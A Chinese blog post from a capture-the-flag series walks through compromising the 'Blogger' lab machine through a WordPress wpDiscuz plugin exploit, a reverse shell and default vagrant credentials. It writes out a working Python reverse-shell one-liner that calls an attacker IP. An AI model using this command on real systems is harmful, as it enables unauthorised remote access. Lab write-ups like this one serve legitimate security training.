iT邦幫忙

2023 iThome 鐵人賽

DAY 17
0

防雷頁


























可能的遺漏

  • 網站服務, 需要細心檢查
  • 路途上可能有很多疑似 Rabbit Hole
  • 進入機器後, 檢查有沒有什麼有趣的帳號

摘要

  • 網站服務, 需要細心檢查, 不常見案例(網站目錄底下還有網站)
  • 路途上可能有很多疑似 Rabbit Hole
    • 初始網站
    • j@m3s, james
    • wp-config.php
    • mysql wp_user
    • /etc/crontab
  • 進入機器後, 檢查有沒有什麼有趣的帳號(vagrant), 可以用預設密碼登入, 且 sudo 沒有限制

Walkthrough

  • 先透過 nmap 確認開什麼 port 和什麼服務
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298gmsJTzo7Fq.png

  • dirb 掃描網站目錄
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298Nt41iyCuyt.png

  • 手動檢查網站
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298bXfFO9FbkD.png

  • 手動檢查網站
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298eoyzmOOIWH.png

  • 手動檢查網站
    https://ithelp.ithome.com.tw/upload/images/20231001/200782988SiaW0clB4.png

  • 手動檢查網站, 感覺樣式跑掉
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298PcYJ69IXSq.png

  • 手動檢查網站, 檢查原始碼, domain name 為 blogger.thm
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298iUQkaEJ4Pl.png

  • 將目標主機和對應 domain name 加入 /etc/hosts
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298C9EtXPq686.png

  • 再次手動檢查網站, 解析成功, 有明顯 wordpress 特徵
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298g54DfvDSS7.png

  • wpscan 掃描網站(01)
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298cg1BuYwEwB.png

  • wpscan 掃描網站(02), 有兩個 plugin(akismet, wpdiscuz)
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298reWFE80uHh.png

  • wpscan 掃描網站(03)
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298H0LggYpW4U.png

  • wpscan 掃描網站(04)
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298emXrjTW8VD.png

  • wpscan 掃描網站(05)
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298PFW3gCtfwN.png

  • wpscan 有 plugin 名稱和版本, 使用 exploitdb 尋找 exploit
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298XiHKUqblfX.png

  • 嘗試選擇 49967.py
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298YAHAeTcHXS.png

  • exploit 成功取得 webshell
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298xMpv7bZXxy.png

  • 使用 python 打 reverse shell 回到攻擊機

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.212",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

https://ithelp.ithome.com.tw/upload/images/20231001/200782983GHGumFDyt.png

  • 使用 python 取得 pty shell
    python3 -c 'import pty; pty.spawn("/bin/bash")'

  • get local.txt
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298y4t6o8kNxA.png

  • find setuid program
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298SNYrS0JD0h.png

  • 檢查 /etc/crontab
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298pr6X0gf1rK.png

  • 檢查 /etc/passwd
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298G0fh3QhkCB.png

  • 家目錄有 vagrant 帳號, 嘗試預設密碼 vagrant, 切換使用者成功, 且 sudo -l 沒有限制, 成功提權為 root
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298wxwFQTrzBY.png

  • get proof.txt
    https://ithelp.ithome.com.tw/upload/images/20231001/20078298DSAGVDOMlh.png

ref


上一篇
[Day 16] PG Play Lampiao Writeup
下一篇
[Day 18] PG Play DriftingBlues6 Writeup
系列文
PG Play 怎麼玩都不累 - 靶機 writeup 思路分享30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言